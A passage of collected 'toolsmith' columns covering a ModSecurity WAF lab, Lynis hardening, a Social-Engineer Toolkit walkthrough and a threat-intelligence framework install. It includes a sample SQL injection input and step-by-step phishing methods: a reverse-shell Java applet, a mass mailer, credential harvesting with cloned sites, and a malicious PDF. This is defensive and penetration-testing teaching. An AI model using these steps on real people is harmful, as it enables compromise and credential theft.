
toolsmith: ModSecurity for IIS


Part 2 of 2 - Web Application Security Flaw Discovery and Prevention

Prerequisites/dependencies
Windows OS with IIS (Win2k8 used for this article)
SQL Server 2005 Express SP4 and Management Studio Express for vulnerable web app
.NET Framework 4.0 for ModSecurity IIS

Introduction

December’s issue continues where we left off in November with part two in our series on web application security flaw discovery and prevention. In November we discussed Arachni, the high-performance, modular, open source web application security scanning framework. This month we’ll follow the logical workflow from Arachni’s distributed, high-performance scan results to using the findings as part of mitigation practices. One of Arachni’s related features is WAF Realtime Virtual Patching.
Trustwave SpiderLabs’ Ryan Barnett has discussed the concept of dynamic application security testing (DAST) data that can be imported into a web application firewall (WAF) for targeted remediation. This discussion included integrating export data from Arachni into ModSecurity, the cross-platform, open source WAF for which he is the OWASP ModSecurity Core Rule Set (CRS) project leader. I reached out to Ryan for his feedback, with particular attention to ModSecurity for IIS, Microsoft’s web server.
He indicated that WAF technology has gained traction as a critical component of protecting live web applications for a number of key reasons, including:
1) Gaining insight into HTTP transactional data that is not provided by default web server logging
2) Utilizing Virtual Patching to quickly remediate identified vulnerabilities
3) Addressing PCI DSS Requirement 6.6
The ModSecurity project is just now a decade old (first released in November 2002), has matured significantly over the years, and is the most widely deployed WAF in existence, protecting millions of websites. “Until recently, ModSecurity was only available as an Apache web server module. That changed, however, this past summer when Trustwave collaborated with the Microsoft Security Response Center (MSRC) to bring the ModSecurity WAF to both the Internet Information Services (IIS) and nginx web server platforms. With support for these platforms, ModSecurity now runs on approximately 85% of internet web servers.”
Among the features that make ModSecurity so popular, a few key capabilities make it extremely useful:
• It has an extensive audit engine which allows the user to capture full inbound and outbound HTTP data. This is not only useful when reviewing attack data but is also extremely valuable for web server administrators who need to troubleshoot errors.
• It includes a powerful, event-driven rules language which allows the user to create very specific and accurate filters to detect web-based attacks and vulnerabilities.
• It includes an advanced Lua API which provides the user with a full-blown scripting language to define complex logic for attack and vulnerability mitigation.
• It also includes the capability to manipulate live transactional data. This can be used for a variety of security purposes including setting hacker traps, implementing anti-CSRF tokens, or cryptographic hash tokens to prevent data manipulation.
In short, Ryan states that ModSecurity is extremely powerful and provides a very flexible web application defensive framework that allows organizations to protect their web applications and quickly respond to new threats.
I also sought details from Greg Wroblewski, Microsoft’s lead developer for ModSecurity IIS.
“As ModSecurity was originally developed as an Apache web server module, it was technically challenging to bring together two very different architectures. The team managed to accomplish that by creating a thin layer abstracting ModSecurity for Apache from the actual server API. During the development process it turned out that the new layer is flexible enough to create another ModSecurity port for the nginx web server. In the end, the security community received a new cross-platform firewall, available for the three most widely used web servers.
The current ModSecurity development process (still open, recently migrated to GitHub) preserves compatibility of features between the three ported versions. For the IIS version, only features that rely on specific web server behavior show functional differences from the Apache version, while the nginx version currently lacks some of the core features (like response scanning and content injection) due to limited extensibility of the server. Most ModSecurity configuration files can be used without any modifications between Apache and IIS servers. The upcoming release of the RTM version for IIS will include a sample of the ModSecurity OWASP Core Rule Set in the installer.”

Installing ModSecurity for IIS

In order to test the full functionality of ModSecurity for IIS I needed to create an intentionally vulnerable web application, and did so following guidelines provided by Metasploit Unleashed. The author wrote these guidelines for Windows XP SP2; I chose Windows Server 2008 just to be contrarian. I first established a Win2k8 virtual machine, enabled the IIS role, downloaded and installed SQL Server 2005 Express SP4, .NET Framework 4.0, and SQL Server 2005 Management Studio Express, then downloaded the ModSecurity IIS 2.7.1 installer. We’ll configure ModSecurity IIS after building our vulnerable application. When configuring SQL Server 2005 Express, ensure you enable SQL Server Authentication and set the password to something you’ll use in the connection string established in Web.config. I used p@ssw0rd1 to meet required complexity. Note: it’s “easier” to build a vulnerable application using SQL Server 2005 Express rather than 2008 or later; for time’s sake and reduced troubleshooting just work with 2005. We’re in test mode here, not production. That said, remember, you’re building this application to be vulnerable by design. Conduct this activity only in a virtual environment and do not expose it to the Internet.
Follow the Metasploit guidelines carefully but remember to establish a proper connection string in the Web.config (line 4) and build it from this sample I’m hosting for you rather than the one included with the guidelines. As an example, I needed to establish my actual server name rather than localhost, I defined my database name as crapapp instead of WebApp per the guidelines, and used p@ssw0rd1 instead of password1 as described.
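For illustration, a connection string of the shape the sample expects might resemble the following sketch; the server name is a placeholder and the exact attribute layout may differ from the hosted sample, so build from that file rather than from this:

  <!-- Hypothetical Web.config connection string sketch; WIN2K8-VM is a placeholder -->
  <appSettings>
    <add key="ConnectionString"
         value="Server=WIN2K8-VM;Database=crapapp;uid=sa;pwd=p@ssw0rd1;" />
  </appSettings>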
I also utilized configurations recommended for the pending ModSecurity IIS install, so go with my version.
Once you’re finished with your vulnerable application build you should browse to http://localhost and first pass credentials that you know will fail, to ensure database connectivity. Then test one of the credential pairs established in the users table, admin/s3cr3t as an example. If all has gone according to plan you should be treated to a successful login message as seen in Figure 1.

FIGURE 1: A successful login to CrapApp
ModSecurity IIS installation details are available via TechNet but I’ll walk you through a bit of it to help overcome some of the tuning issues I ran into. Make sure you have the full version of .NET 4.0 installed and patch it in full before you execute the ModSecurity IIS installer you downloaded earlier.
Download the ModSecurity OWASP Core Rule Set (CRS) and, as a starting point, copy the files from base_rules to the crs directory you create in C:\inetpub\wwwroot. Also put the test.conf file I’m hosting for you in C:\inetpub\wwwroot. This will call the just-mentioned CRS that Ryan maintains and also allow you to drop any custom rules you may wish to create right in test.conf.
There are a few elements to be comfortable with here. Watch the Windows Application logs via Event Viewer, both to debug any errors you receive and to see ModSecurity alerts once properly configured. I’m hopeful that the debugging time I spent will help save you a few hours, but watch those logs regardless. Also make regular use of Internet Information Services (IIS) Manager to refresh the DefaultAppPool under Application Pools, as well as to restart the IIS instance after you make config changes. Finally, this experimental installation intended to help get you started is running in active mode versus passive. It will both detect and block what the CRS notes as malicious. As such, you’ll want to initially comment out all the HTTP Policy rules in order to play with the CrapApp we built above. To do so, open modsecurity_crs_30_http_policy.conf in the crs directory and comment out all lines that start with SecRule. Again, we’re in experiment mode here. Don’t deploy ModSecurity in production with the SecDefaultAction directive set to "block" without a great deal of testing in passive mode first or you’ll likely blackhole known good traffic.
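For reference, a minimal sketch of what a test.conf of this sort might contain follows; treat it as an assumption-laden starting point rather than the hosted file itself:

  # Minimal ModSecurity IIS test.conf sketch (paths assume C:\inetpub\wwwroot)
  SecRuleEngine On
  SecRequestBodyAccess On
  # "deny" makes this an active/blocking config; use "pass" while tuning
  SecDefaultAction "phase:2,deny,log,status:403"
  # Pull in the OWASP CRS base rules copied into the crs directory
  Include c:\inetpub\wwwroot\crs\*.conf
  # Custom rules can be dropped below this line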

Using ModSecurity and virtual patching to protect applications

Now that we’re fully configured, I’ll show you the results of three basic detections, then close with a bit of virtual patching for your automated web application protection pleasure. Figure 2 is a mashup of a login attempt via our CrapApp with a path traversal attack and the resulting detection and block as noted in the Windows Application log.

FIGURE 2: Path traversal attack against CrapApp denied
Similarly, a simple SQL injection such as ‘1=1-- against the same form field results in the following Application log entry snippet:
[msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:txtLogin: '1=1--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]

Note the various tags, including a match to the appropriate OWASP Top 10 entry as well as the relevant section of the PCI DSS.
Ditto if we pop in a script tag via the txtLogin parameter:
[data "Matched Data: "] [ver "OWASP_CRS/2.2.6"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"]
    
Finally, we’re ready to connect our Arachni activities in Part 1 of this campaign to our efforts with ModSecurity IIS. There are a couple of ways to look at virtual patching, as amply described by Ryan. His latest focus has been more on dynamic application security testing as actually triggered via ModSecurity. There is now Lua scripting that integrates ModSecurity and Arachni over RPC, where a specific signature hit from ModSecurity will contact the Arachni service and kick off a targeted scan. At last check this code was still experimental and likely to be challenging with the IIS version of ModSecurity. That said, we can direct our focus in the opposite direction and utilize Ryan’s automated virtual patching script, arachni2modsec.pl, where we gather Arachni scan results and automatically convert the XML export into rules for ModSecurity. These custom rules will then protect the vulnerabilities discovered by Arachni while you haggle with the developers over how long it’s going to take them to actually fix the code.
To test this functionality I scanned the CrapApp from the Arachni instance on the Ubuntu VM I built for last month’s article. I also set the SecDefaultAction directive to "pass" in my test.conf file to ensure the scanner is not blocked while it discovers vulnerabilities. Currently the arachni2modsec.pl script writes rules specifically for SQL Injection, Cross-site Scripting, Remote File Inclusion, Local File Inclusion, and HTTP Response Splitting. The process is simple; assuming the results file is results.xml, arachni2modsec.pl -f results.xml will create modsecurity_crs_48_virtual_patches.conf. On my ModSecurity IIS VM I’d then copy modsecurity_crs_48_virtual_patches.conf into the C:\inetpub\wwwroot\crs directory and refresh the DefaultAppPool. Figure 3 gives you an idea of the resulting rule.

FIGURE 3: arachni2modsec script creates rule for ModSecurity IIS
Note how the rule closely resembles the alert spawned when I passed the simple SQL injection attack to CrapApp earlier in the article. Great stuff, right?
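Condensed, the end-to-end virtual patching workflow looks something like the following sketch; the target URL is a placeholder and the Arachni report flag varies by version, so check arachni --help on your build:

  # On the Arachni (Ubuntu) VM: scan the target and export XML results
  ./arachni http://crapapp-host/ --report=xml:outfile=results.xml
  # Convert the findings into ModSecurity virtual patches
  perl arachni2modsec.pl -f results.xml
  # Then, on the IIS VM (cmd.exe): deploy the rules and refresh the app pool
  copy modsecurity_crs_48_virtual_patches.conf C:\inetpub\wwwroot\crs\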

In Conclusion

What a great way to wrap up 2012 with the conclusion of this two-part series on Web Application Security Flaw Discovery and Prevention. I’m thrilled with the performance of ModSecurity for IIS and really applaud Ryan and Greg for their efforts. There are a number of instances where I intend to utilize the ModSecurity port for IIS and will share feedback as I gather data. Please let me know how it’s working for you as well should you choose to experiment and/or deploy.
Good luck and Merry Christmas.
Stay tuned to vote for the 2012 Toolsmith Tool of the Year starting December 15th.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Ryan Barnett, Trustwave Spider Labs, Security Researcher Lead
Greg Wroblewski, Microsoft, Senior Security Developer


toolsmith: Hey Lynis, Audit This


Prerequisites/dependencies
Unix/Linux operating systems

Introduction
Happy holidays to all readers, the ISSA community, and infosec tool users everywhere. As part of December’s editorial theme for the ISSA Journal, Disaster Recovery/Disaster Planning, I thought I’d try to connect tooling and tactics to said theme. I’m going to try and do this more often so you don’t end up with a web application hacking tool as part of the forensics and analysis issue. I can hear Tom (editor) and Joel (editorial advisory board chair) now: “Congratulations Russ, it only took you seven years to catch up with everyone else, you stubborn git.” :-)
Better late than never, I always say, so back to it. As cited in many resources, including Georgetown University’s System and Operations Continuity page, “Of companies that had a major loss of business data, 43% never reopen, 51% close within two years, and only 6% will survive long-term.” Clearly then, a sound disaster recovery and planning practice is essential to survival. The three control measures for effective disaster recovery planning are preventive, detective, and corrective. This month we’ll discuss Lynis, a security and system auditing tool to harden Unix/Linux (*nix) systems, as a means by which to facilitate both preventive (intended to prevent an event from occurring) and detective (intended to detect and/or discover unwanted events) controls. How better to do so than with a comprehensive and effective tool that performs a security scan and determines the security posture of your *nix systems while providing suggestions or warnings for any detected security issues? I caught wind of Lynis via toolswatch, a great security tools site that provides quick snapshots of tools useful to infosec practitioners. NJ Ouchn (@ToolsWatch), who runs toolswatch and the Blackhat Arsenal Tools event during Blackhat conferences, mentioned a new venture for the Lynis author (CISOfy), so it seemed like a great time to get the scoop directly from Rootkit.nl’s Michael Boelen, the Lynis developer and project lead.
According to Michael, there is much to be excited about, as a Lynis Enterprise solution, including plugins for malware detection, forensics, and heuristics, is under development. This solution will include the existing Lynis client that we’ll cover here, a management and reporting interface, and related plugins. Michael says they’re making great progress and each day brings them closer to an official first version. Specific to the plugins, while a work in progress, they create specialized hooks via the client. As an example, imagine heuristics scanning with correlation at the central node to detect security intrusions. Compliance checking for the likes of Basel II, GLBA, HIPAA, PCI DSS, and SOX is another likely plugin candidate.
The short-term roadmap consists of finishing the web interface, followed by the supporting documents. This will include documentation, checklists, control overviews and materials for system administrators, security professionals and auditors in particular. This will be followed by the plugins and related services. In the meantime CISOfy will heavily support the development of the existing Lynis tool, as it is the basis of the enterprise solution. Michael mentions that Lynis is already being used by thousands of people responsible for keeping their systems secure.
A key tenet for Lynis is proper information gathering and vulnerability determination/analysis in order to provide users with the best advice regarding system hardening. Lynis will ultimately provide not only auditing functionality but also monitoring and control mechanisms; remember the above-mentioned preventive and detective controls? For monitoring, there will be a clear dashboard to review the environment for expected and unexpected changes, with a light touch for system administrators and integration with existing SIEM or configuration management tools. The goal is to leverage existing solutions and not reinvent the wheel.
Lynis and Lynis Enterprise will ultimately provide guidance to organizations who can then more easily comply with regulations, standards and best practices by defining security baselines and ready-to-use plans for system hardening in a more measurable and action-oriented manner.
One other significant advantage of Lynis is how lightweight and easy to implement it is. The requirements to run the tool are almost non-existent and it is, of course, open source, allowing ready inspection and assurance that it’s not overly intrusive. Michael intends to provide the supporting tools (such as the management interface) as a Software-as-a-Service (SaaS) solution, but he did indicate that, depending on customer feedback and need, CISOfy might consider appliances at a later stage.
I conducted an interesting little study of three unique security-centric Linux distributions running as VMware virtual machines to put Lynis through its paces and compare results, namely SIFT 2.1.4, SamuraiWTF 2.1, and Kali 1.0. Each was assessed as a pristine, new instance, as if it had just been installed or initialized.

Setting Lynis up for use

Lynis is designed to be portable and as such is incredibly easy to install. Simply download and unpack Lynis to a directory of your choosing. You can also create custom packages if you wish; Lynis has been tested on multiple operating systems including Linux, all versions of BSD, Mac OS X, and Solaris. It's also been tested with all the package managers related to these operating systems so deployment and upgrading is fundamentally simple. To validate its portability I installed it on USB media as follows.
1) On a Linux system, downloaded lynis-1.3.5.tar.gz
2) Copied and unpacked it to /media/LYNIS/lynis-1.3.5 (an ext2-formatted USB stick)
3) In the VMware menu, selected VM, then Removable Devices, and checked Toshiba Data Traveler to make my USB stick available to the three virtual machines mentioned above.
You can opt to make modifications to the profile configuration (default.prf) file to disable or enable certain checks, and establish a template for operating system, system role, and/or security level. I ran my test on the three VMs with the default profile.

Using Lynis

This won’t be one of those toolsmith columns with lots of pretty pictures; we’re dealing with a command prompt and text output when using the Lynis client. Which is to say, change directories to your USB drive, such as cd /media/LYNIS/lynis-1.3.5 on my first test instance, followed by sh lynis --auditor HolisticInfoSec -c from a root prompt as seen in Figure 1.

FIGURE 1: Lynis kicking off
You can choose to use the -q switch for quiet mode, which prompts only on warnings and doesn’t require you to step through each prompted phase. Once Lynis is finished you can immediately review results via /var/log/lynis-report.dat and grep for suggestions and warnings. You’re ultimately aiming for a hardening index of 100. Unfortunately our first pass on the Kali system yielded only a 50. Lynis suggested installing auditd and removing unneeded compilers. Please note, I am not suggesting you actually do this with your Kali instance, fine if it’s a VM snapshot; this is just to prove my point re: Lynis findings. Doing so did however increase the hardening index to a 51. :-)
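For quick reference, the run and triage steps condense to the following; the paths are from my USB setup above:

  cd /media/LYNIS/lynis-1.3.5
  sh lynis --auditor HolisticInfoSec -c    # add -q for quiet mode
  # After the run, pull findings from the report
  grep 'warning\[\]' /var/log/lynis-report.dat
  grep 'suggestion\[\]' /var/log/lynis-report.dat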
Lynis really showed its stuff while auditing the SANS SIFT 2.1.4 instance. The first pass gave us a hardening index of 59 and a number of easily rectified warnings. I immediately corrected the following and ran Lynis again:
  • warning[]=AUTH-9216|M|grpck binary found errors in one or more group files|
  • warning[]=FIRE-4512|L|iptables module(s) loaded, but no rules active|
  • warning[]=SSH-7412|M|Root can directly login via SSH|
  • warning[]=PHP-2372|M|PHP option expose_php is possibly turned on, which can reveal useful information for attackers.|
Running grpck told me that 'sansforensics' is a member of the 'ossec' group in /etc/group but not in /etc/gshadow. Easily fixed by adding ossec:!::sansforensics to /etc/gshadow.
I ran sudo ufw enable to fire up active iptables rules, then edited /etc/ssh/sshd_config with PermitRootLogin no to ensure no direct root login. Always do this, as root will be brute-force attacked, and you can sudo as needed from a regular user account with sudoers permissions. Finally, changing expose_php to Off in /etc/php5/apache2/php.ini solves the PHP finding.
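A condensed sketch of those four fixes follows, assuming the SIFT 2.1.4 paths above and stock directive values (test against a VM snapshot first):

  # Reconcile /etc/group and /etc/gshadow per grpck's complaint
  echo 'ossec:!::sansforensics' >> /etc/gshadow
  # Activate iptables rules via ufw
  ufw enable
  # Disallow direct root SSH login, then restart sshd
  sed -i 's/^PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config
  service ssh restart
  # Stop advertising the PHP version
  sed -i 's/^expose_php = On/expose_php = Off/' /etc/php5/apache2/php.ini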
Running Lynis again after just these four fixes improved the hardening index from 59 to 69. Sweet!
Last but not least, an initial Lynis run against SamuraiWTF informed us of a hardening index of 47. Uh-oh, thank goodness the suggestion list per sudo cat /var/log/lynis-report.dat | grep suggestion gave us a lot of options to make some systemic improvements as seen in Figure 2.

FIGURE 2: Lynis suggests how the Samurai might harden his foo
Updating just a few entries pushed the hardening index to 50; you can spend as much time and effort as you believe necessary to increase the system’s security posture along with the hardening index.
The end of a Lynis run, if you don’t suppress verbosity with the -q switch, will result in the likes of Figure 3, including your score, log and report locations, and tips for test improvement.

FIGURE 3: The end of a verbose Lynis run
Great stuff and incredibly simple to utilize!

Conclusion

I’m looking forward to the Lynis Enterprise release from Michael’s CISOfy and believe it will have a lot to offer for organizations looking for a platform-based, centralized means to audit and harden their *nix systems. Again, count on reporting and plugins as well as integration with SIEM systems and configuration management tools such as CFEngine. Remember too what Lynis can do to help you improve auditability against controls for major compliance mandates.
Good luck, and wishing you all a very Happy Holidays.
Stay tuned to vote for the 2013 Toolsmith Tool of the Year starting December 15th.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Michael Boelen, Lynis developer and project lead

toolsmith: Social-Engineer Toolkit (SET) - Pwning the Person


Prerequisites/dependencies
Python interpreter
Metasploit
BackTrack 5 R3 also includes SET

Introduction
My first discussion of Dave Kennedy’s (@dave_rel1k) Social-Engineer Toolkit (SET) came during exploration of the Pwnie Express PwnPlug Elite for March 2012’s toolsmith. It was there I talked about the Site Cloner feature found under Website Attack Vectors and Credential Harvesting Attack Methods. Unless you’ve been hiding your head in the sand (“if I can’t see the security problem, then it doesn’t exist”) you’re likely aware that targeted attacks such as spear phishing, whaling, and social engineering in general are prevalent. Additionally, penetration testing teams will inevitably fall back on this tactic if it’s left in scope for one reason: it always works. SET serves to increase awareness of all the possible social engineering vectors; trust me, it is useful for striking much fear in the hearts of executives and senior leaders at client, enterprise, and military briefings. It’s also useful for really understanding the attacker mindset. With distributions such as BackTrack including SET, fully configured and ready to go, it’s an absolute no-brainer to add to your awareness briefing and/or pen-testing regimen.
Dave is the affable and dynamic CEO of TrustedSec (@trustedsec) and, as SET’s creator, describes it in his own words:

The Social-Engineer Toolkit has been an amazing ride and the support for the community has been great. When I first started the toolkit, the main purpose was to help out on social engineering gigs but it's completely changed to an entire framework for social-engineering and the community. SET has progressed from a simple set of python commands and web servers to a full suite of attacks that can be used for a number of occasions. With the new version of SET that I'm working on, I want to continue to add customizations to the toolkit where it allows you to utilize the multi attack vector and utilize it in a staged approach that’s all customized. When I'm doing social-engineering gigs, I change my pretext (attack) on a regular basis. Currently, I custom code some of my options such as credential harvester first then followed by the Java Applet. I want to bring these functionalities to SET and continue forward with the ability to change the way the attack works based on the situation you need. I use my real life social-engineering experiences with SET to improve it, if you have any ideas always email me to add features!

Be sure to catch Dave’s presentation videos from DEFCON and DerbyCon, amongst others, on the TrustedSec SET page.

Quick installation notes

It’s easiest to run SET from BackTrack. Boot to it via USB or optical media, or run it as a virtual machine. Navigate to Applications | BackTrack | Exploitation Tools | Social Engineering Tools | Social Engineering Toolkit | set and you’re off to the races.
Alternatively, on any system where you have a Python interpreter and a Git (version control/source code management) client, you can have SET up and running in minutes. Ideally, the system you choose to run SET from should have Metasploit configured too, as SET calls certain Metasploit payloads, but it’s not a hard-and-fast dependency. If no Metasploit, many SET features won’t work; simple. But if you plan to go full goose bozo…you catch my drift.
I installed SET on Ubuntu 12.10 as well as Windows 7 64-bit as simply as running git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ from a Bash shell (Ubuntu) or Git Shell (Windows). Note: if you’re running anti-malware on a Windows system where SET is to be installed, be sure to build an exclusion for the SET path or AV will eat some key exploits (six to be exact). A total bonus for you and me occurred as I wrote this. On 24 JAN, Dave released version 4.4.1 of SET, codename “The Goat.” If you read the CHANGES file in SET’s readme directory you’ll learn that this release includes some significant Java Applet updates, encoding and encryption functionality enhancements, and improvements for multi_pyinjector. I updated my BackTrack 5 R3 instance to SET 4.4.1 by changing directory to /pentest/exploits, issuing mv set set_back, then the above-mentioned git command. Almost instantly, a shiny new SET ready for a few laps around the track. Your SET instance needs to be available via the Internet for remote targets to phone home to, or exposed to your local network for enterprise customers. You’ll be presenting a variety of offerings to your intended victims via the SET server IP or domain name.
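The whole update dance reduces to a few commands; the BackTrack path is from my instance, and the launcher name may vary with your version:

  cd /pentest/exploits
  mv set set_back    # preserve the previous install
  git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
  cd set && ./set    # launch SET (or 'python set', depending on version)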

SET unleashed

Now to rapid fire some wonderful social engineering opportunities at you. How often do you or someone you know wander up to a sign or stop at a web page with a QR code and just automatically scan it with your smart phone? What if I want to send you to any site of my choosing? I’ll simply generate a QR code with the URL destination I want to direct you to. If I’m a really bad human being that site might be offering up the Blackhole exploit kit or something similar. Alternatively, as SET recommends when you choose this module, “when you have the QRCode generated, select an additional attack vector within SET and deploy the QRCode to your victim. For example, generate a QRCode of the SET Java Applet and send the QRCode via a mailer.”
From the SET menu, choose 1) Social-Engineering Attacks, then 9) QRCode Generator Attack Vector, and enter your desired destination URL. SET will generate the QR code and write it to /pentest/exploits/set/reports-qr_attack.png as seen in Figure 1.

Figure 1: QR Code attack generated by SET
From SET’s main menu, 3) Third Party Modules will offer you the RATTE Java Applet Attack (Remote Administration Tool Tommy Edition), and 2) Website Attack Vectors | 1) Java Applet Attack Method will provide templates or site cloning with which you can deliver one heck of a punch via the QR code vector.

Our good friend Java is ripe for social engineering targeting opportunities, and SET offers mayhem aplenty to capitalize on this fact. Here’s a sequence to follow from the SET menu:
1) Social-Engineering Attacks | 2) Website Attack Vectors | 1) Java Applet Attack Method | 1) Web Templates

Answer yes or no to NAT/Port Forwarding, enter your SET server IP or hostname, and select 1 for the Java Required template as seen in Figure 2.

Figure 2: Java applet prepped for deployment
You’ll then need to choose what payload you wish to generate. Methinks ye olde Windows Reverse_TCP Meterpreter Shell (#2 on the list) is always a safe bet. Select it accordingly. From the list of encodings, #16 on the list (Backdoored Executable) is described as the best bet. Make it so. Accept 443 as the default listener port and wait while SET generates injection code as seen in Figure 3.

Figure 3: SET-generated injection code
The Metasploit framework will then launch (wake up, Neo...the matrix has you…follow the white rabbit) and the handlers will standby for your victim to come their way.
Now, as the crafty social engineer that you are, you devise an email campaign to remind users of the “required Java update.” By the way, this campaign can be undertaken directly from SET as well via 1) Social-Engineering Attacks | 5) Mass Mailer Attack. When one or more of your victims receives the email and clicks the embedded link they’ll be sent to your SET server where much joy awaits them as seen in Figure 4.

Figure 4: Victim presented with Java required and “trusted” applet
When the victim selects Run, and trust me they will, the SET terminal on the SET server will advise you that a Meterpreter session has been opened with the victim as seen in Figure 5.

Figure 5: Anyone want a shell?
For our last little bit of fun, let’s investigate 3) Infectious Media Generator under 1) Social-Engineering Attacks. If you select File-Format Exploits, after setting up your listener, you’ll be presented with a smorgasbord of payloads. I selected 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow as I had an old VM with an old Foxit version on it. Sweet! When I opened the file-format exploit PDF created by SET with Foxit 4.1.1, well…you know what happened next.
As discussed in the PwnPlug article, don’t forget the Credential Harvester Attack Methods under Website Attack Vectors. This is quite literally my favorite delivery vehicle as it is utterly bomb proof. Nothing like using the templates for your favorite social media sites (you know who you are) and watching as credentials roll in.

In Conclusion

Evil-me really loves SET; it’s more fun than a clown on fire. Remember, as always with tools of this ilk, you’re the good guy in this screenplay. Use SET to increase awareness, put the fear of God in your management, motivate your clients, and school the occasional developer. Anything else is flat out illegal. :-) As Dave mentioned, if you have ideas for new features or enhancements for SET, he really appreciates feedback from the community.

Ping me via email if you have questions or suggestions for topic via russ at holisticinfosec dot org or hit me on Twitter via @holisticinfosec.
Cheers…until next month.

Acknowledgements

Dave Kennedy, Founder, TrustedSec, SET project lead

2012 Toolsmith Tool of the Year: ModSecurity for IIS

Congratulations to Ryan Barnett of Trustwave and Greg Wroblewski of Microsoft.
ModSecurity for IIS is the 2012 Toolsmith Tool of the Year.
ModSecurity for IIS finished with 35.4% of the vote, while the Pwnie Express Pwn Plug came in second with 22.8%, and the Arachni Web Application Security Scanner came in third with 18.1% of the votes.

As ModSecurity is best utilized with the OWASP ModSecurity Core Rule Set (CRS), I will make a $50 donation to the CRS Project. I strongly advocate for your supporting this project as well; any amount will help.

Congratulations and thank you to all of this year's participants; we'll have another great round in 2013.

toolsmith: Collective Intelligence Framework


Prerequisites
Linux for server, stable on Debian Lenny and Squeeze, and Ubuntu v10
Perl for client (stable), Python client currently unstable

Introduction

As is often the case when plumbing the depths of my feed reader or the Dragon News Bytes mailing list, I found toolsmith gold. Kyle Maxwell’s Introduction to the Collective Intelligence Framework (CIF) lit up on my radar screen. CIF parses data from sources such as ZeuS and SpyEye Tracker, Malware Domains, Spamhaus, Shadowserver, Dragon Research Group, and others. The disparate data is then normalized into a repository that allows chronological threat intelligence gathering. Kyle’s article is an excellent starting point that you should definitely read, but I wanted to hear more from Wes Young, the CIF developer, who kindly filled me in with some background and a look forward. Wes is a Principal Security Engineer for REN-ISAC, whose mission is to aid and promote cyber security operational protection and response within the higher education and research (R&E) communities. As such, the tenor of his feedback makes all the more sense.
The CIF project has been an interesting experiment for us. When we first decided to transition the core components from incubation in a private trust-based community, to a more traditional open-source community model, it was merely to better support our existing community. We figured, if things were open-source, our community would have an easier time replicating our tools and processes to fit their own needs internally. If others outside the educational space benefited from that (private sector, government sector, etc), then that'd be the icing on the cake.
Years later, we discovered that ratio has nearly inverted itself. Now the CIF community has become lopsided, with the majority of users being from the international public and private spaces. Furthermore, the contribution in terms of testing, bug-fixes, documentation contributions and [more importantly] the word-of-mouth endorsements has driven CIF to become its own living organism. The demonstrated value it has created for threat analysts, who have traditionally had to beg-borrow-and-steal their own intelligence, has become immeasurable in relation to the minor investment of adoption.
As this project's momentum has given it a life all its own, future roadmaps will build off its current success. The ultimate goal of the CIF project is to create a uniform presence of your intelligence, somewhere you control. It'll read your blogs, your sandboxes, and yes, even your email (if you allow it), correlating and digging out threat information that's been traditionally locked in plain, wiki-fied or semi-formatted text. It has enabled organizations to defend their networks with up-to-the-second intelligence from traditional data sources as well as their peers. While traditional SEMs enable analysts to search their data, CIF enables your data to adapt your network, seamlessly and on the fly. It's your own personal Skynet. :)

Readers may enjoy Wes’ recent interview on the genesis of CIF, available as a FIRST 2012 podcast.
You may also wish to take a close look at Martin Holste’s integration of CIF with his Enterprise Log Search and Archive (ELSA) solution, a centralized syslog framework. Martin has utilized the Sphinx full-text search engine to create accelerated query functionality and a full web front end.

Installing CIF

The documentation found on the CIF wiki should be considered “must read” from top to bottom before proceeding. I won’t repeat what’s already been said (Kyle’s article has some installation pointers too), but I went through the process a couple of times to get it right, so I’ll share my experience. There are a number of elements to consider if implementing CIF in a production capacity. While I installed a test instance on insignificant hardware running Debian Squeeze, if you have a 64-bit system with 8GB of RAM or more and a minimum of four cores with drive space to grow into, definitely use it for CIF. If you can also install a fresh OS, pay special attention to your disk layout while configuring partition mapping during the Logical Volume Manager (LVM) setup. Also follow the Postgres database configuration steps closely if working from a fresh install. You’ll be changing ident sameuser to trust in pg_hba.conf for socket connections. On weak little systems such as my test server, Kyle’s suggestion to update work_mem to 512MB and checkpoint_segments to 32 in postgresql.conf is a good one. The BIND setup is quite straightforward, but again per Kyle’s feedback, make sure your forwarder IP addresses in /etc/resolv.conf match those you configure in /etc/bind/named.conf.options.
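Those Postgres tweaks amount to the following; config file paths vary by Debian/Postgres version, so locate yours first:

  # postgresql.conf
  work_mem = 512MB
  checkpoint_segments = 32

  # pg_hba.conf -- change socket connections from ident sameuser to trust
  # before: local  all  all  ident sameuser
  # after:  local  all  all  trust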
From there the install steps on the wiki can be followed verbatim. During the Load Data phase of configuration you may run into an XML parsing issue. After executing time /opt/cif/bin/cif_crontool -f -d && /opt/cif/bin/cif_crontool -d -p daily && /opt/cif/bin/cif_crontool -d -p hourly you may receive an error. The cif_crontool script is similar to cron, as I hope you’ve sagely intuited for yourself; it traverses the CIF feed configuration files and instructs cif_feedparser accordingly. The error, :170937: parser error : Sequence ']]>' not allowed in content, crops up when cif_crontool attempts to parse the cleanmx feed definition in /opt/cif/etc/misc.cfg. You can resolve this by simply commenting out that definition. Wes is reaching out to clean-mx.de to get this fixed; right now there is no option other than to comment out the feed.
To install a client you need only follow the Client Setup steps, and in your ~/.cif file apply the apikey that you created during the server install, as described in CIF Config. Don’t forget to configure .cif to generate feeds, as also described in that section.
A final installation note: if you don’t feel like spending the time to do your own build, you have the option to utilize a preconfigured Amazon EC2 instance (limited disk space, not production-ready).

Using CIF

You should set the following up as a cron job, per the Server Install; for manual reference, if you wish to update your data at random intervals, run as sudo su - cif (a crontab sketch follows the list):
1) PATH=/bin:/usr/local/bin:/opt/cif/bin
2) Pull feed data:
   a. cif_crontool -p daily -T low
   b. cif_crontool -p hourly -T low
